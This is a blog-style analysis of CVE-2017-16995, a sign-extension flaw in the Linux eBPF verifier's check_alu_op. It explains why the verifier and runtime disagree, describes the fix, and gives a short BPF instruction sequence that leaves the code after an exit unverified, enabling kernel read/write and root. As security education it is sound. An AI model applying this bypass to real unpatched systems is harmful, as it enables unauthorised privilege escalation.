bpf check_alu_op vulnerability analysis (CVE-2017–16995)
Around December 2017, CVE-2017–16995 was published:
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
I have come across this kernel exploit when rooting a machine on HackTheBox, and used it to gain root privileges. This was what led me to try to understand it.
First, we’ll want to understand, what is bpf exactly?
Berkeley Packet Filter (BPF) mostly allows you to run filters against packets at the kernel space. Filters are a set of instructions running inside the BPF virtual machine. Since Linux version 3.18, eBPF (extended BPF) was introduced. eBPF then allowed to attach those filters to sockets, tracepoints (for debugging purposes), and more. For example, tcpdump uses BPF bytecode to filter packets. You can view the BPF instructions if you add the -d
argument:
The BPF Verifier
The bpf syscalls are essentially allowing to run code at the kernel space from the user space. That’s a security risk, hence we have the BPF verifier. Its purpose is to make sure the instructions are safe to run. Here are some of the checks it performs:
- Verifies the program isn’t too big
- Forbids loops (DAG check)
- Forbids unreachable instructions from existing in the code
- Forbids reading from uninitialized registers
- Forbids exiting the filter without setting a return value first
- Verifies the program isn’t accessing invalid memory
The Vulnerability
The vulnerable function check_alu_op
is responsible for checking the validity of arithmetic instructions. When the static code analyzer wants to MOV an immediate value into a register, the following code will execute in the verifier:
Let’s look at the bpf_insn
struct, and the signature of __mark_reg_known
:
By looking at the struct, we can see that the immediate value is a signed 32-bit integer, and the imm
parameter in __mark_reg_known
is an unsigned 64-bit integer. Therefore, an implicit type conversion occurs.
But what happens when we convert a signed integer into an unsigned one? According to this document, the conversion happens this way:
Let’s say we have this BPF instruction:
The immediate is a signed 32-bit int, so it’s actually -1 in decimal. We perform the above calculation with a MAX_UNSIGNED_INT
of 64-bit: 0xFFFFFFFFFFFFFFFF
This is essentially sign extension, the most significant bit was extended throughout the 64-bit “register”. What should’ve happened is zero-padding of the upper 32-bits, since this is a MOV32 operation.
This resulted in 0xFFFFFFFFFFFFFFFF
being saved to the hypothetical register state in the static code analyzer. But in reality, when the instructions will run, the register would be zero-padded: 0x00000000FFFFFFFF
. Now we’re going to try and understand why the verifier is different than the actual code execution.
Let’s take a look at the bpf core code, specifically __bpf_prog_run
What we’re interested in is the BPF_ALU | BPF_MOV | BPF_K
. For reference: BPF_K
means the source operand is an immediate value. BPF_X
means the source operand is a register. Let’s look at the operation:
What differs here from the simulated MOV operation at the verifier, is that the immediate value is cast to an unsigned integer. This prevents the incorrect sign extension from occurring, and the result would be 0xFFFFFFFF
. Casting to unsigned before moving is also the fix that was deployed for this issue.
Exploitation
We learned that the static code analyzer thinks we have a different immediate value in the register than what would’ve been during “real” code execution. The documentation in linux/kernel/bpf/verifier.c
states:
bpf_check() is a static code analyzer that walks eBPF program instruction by instruction and updates register/stack state. All paths of conditional branches are analyzed until 'bpf_exit' insn.
The common way to exploit this vulnerability is to trick the analyzer into thinking the code always exits with a conditional:
mov32 r2, 0xFFFFFFFF // r2 gets sign-extended in the verifier jne r2, 0xFFFFFFFF, +2 // if r2!=0xFFFFFFFF, jmp 2 instruction ahead mov64 r0, 0x0 // set return code to 0 bpf_exit // stop execution - verifier stops here
Let’s take a look at a part of the code that handles conditional jumps:
tnum_equals_const
is responsible for comparing the register state to the immediate value. We already know that insn->imm
is a 32-bit signed integer, but inside the tnum
struct, tnum.value
is an unsigned 64-bit integer.
So what happens when we compare a signed and an unsigned integer? Simply put, the compiler converts the signed integer to an unsigned, repeating the same sign extension we’ve looked at previously. Can you guess the output of this code?
The output would be true. After understanding this, it’s clear that the aforementioned code would continue in the fall-through branch, going to the bpf_exit
call, and leaving any code coming after the exit call unverified.
Leveraging this issue, an attacker could insert malicious code after the exit call, and have arbitrary R/W access to the kernel memory.
Extra information: eBPF Instructions Doc, PoC of Privilege Escalation, another PoC